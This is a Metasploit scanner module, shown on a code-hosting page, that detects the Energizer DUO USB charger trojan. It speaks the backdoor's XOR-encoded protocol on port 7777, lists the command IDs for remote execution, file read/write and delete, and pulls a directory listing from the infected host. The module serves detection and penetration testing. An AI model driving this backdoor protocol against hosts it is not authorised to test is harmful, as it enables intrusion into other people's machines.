Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'English'

7
class MetasploitModule < Msf::Auxiliary

8
  include Msf::Exploit::Remote::Tcp

9
  include Msf::Auxiliary::Scanner

10
  include Msf::Auxiliary::Report

11


12
  def initialize

13
    super(

14
      'Name' => 'Energizer DUO Trojan Scanner',

15
      'Description' => 'Detect instances of the Energizer DUO trojan horse software on port 7777.',

16
      'Author' => 'hdm',

17
      'References' => [

18
        ['CVE', '2010-0103'],

19
        ['OSVDB', '62782'],

20
        ['US-CERT-VU', '154421']

21
      ],

22
      'License' => MSF_LICENSE,

23
      'Notes' => {

24
        'Stability' => [CRASH_SAFE],

25
        'SideEffects' => [],

26
        'Reliability' => []

27
      }

28
    )

29


30
    register_options(

31
      [

32
        Opt::RPORT(7777),

33
      ]

34
    )

35
  end

36


37
  def trojan_encode(str)

38
    str.unpack('C*').map { |c| c ^ 0xE5 }.pack('C*')

39
  end

40


41
  def trojan_command(cmd)

42
    cid = ''

43


44
    case cmd

45
    when :exec

46
      cid = '{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}'

47
    when :dir

48
      cid = '{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}'

49
    when :write

50
      cid = '{98D958FC-D0A2-4f1c-B841-232AB357E7C8}'

51
    when :read

52
      cid = '{F6C43E1A-1551-4000-A483-C361969AEC41}'

53
    when :nop

54
      cid = '{783EACBF-EF8B-498e-A059-F0B5BD12641E}'

55
    when :find

56
      cid = '{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}'

57
    when :yes

58
      cid = '{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}'

59
    when :runonce

60
      cid = '{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}'

61
    when :delete

62
      cid = '{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}'

63
    end

64


65
    trojan_encode(

66
      [0x27].pack('V') + cid + "\x00"

67
    )

68
  end

69


70
  def run_host(ip)

71
    connect

72
    sock.put(trojan_command(:dir))

73
    sock.put(

74
      trojan_encode(

75
        [4].pack('V') + "C:\\\x00\x00"

76
      )

77
    )

78


79
    lbuff = sock.get_once(4, 5)

80
    if !lbuff

81
      print_error("#{ip}:#{rport} UNKNOWN: No response to the directory listing request")

82
      disconnect

83
      return

84
    end

85


86
    len = trojan_encode(lbuff).unpack('V')[0]

87
    dbuff = sock.get_once(len, 30)

88
    data = trojan_encode(dbuff)

89
    files = data.split('|').map do |x|

90
      if x[0, 2] == '?1'

91
        ['D', x[2, x.length - 2]]

92
      else

93
        ['F', x]

94
      end

95
    end

96


97
    # Required to prevent the server from spinning a loop

98
    sock.put(trojan_command(:nop))

99


100
    print_good("#{ip}:#{rport} FOUND: #{files.inspect}")

101
    # Add Vulnerability and Report

102
    report_vuln({

103
      host: ip,

104
      name: 'Energizer DUO USB Battery Charger Software Arucer.dll Trojaned Distribution',

105
      refs: references

106
    })

107
    report_note(

108
      host: ip,

109
      proto: 'tcp',

110
      port: datastore['RPORT'],

111
      sname: 'energizer_duo',

112
      type: 'Energizer DUO Trojan',

113
      data: { energizer_duo_trojan: files.inspect }

114
    )

115
    disconnect

116
  rescue ::Interrupt

117
    raise $ERROR_INFO

118
  rescue ::Rex::ConnectionError, ::IOError => e

119
    vprint_error(e.message)

120
  end

121
end

122


123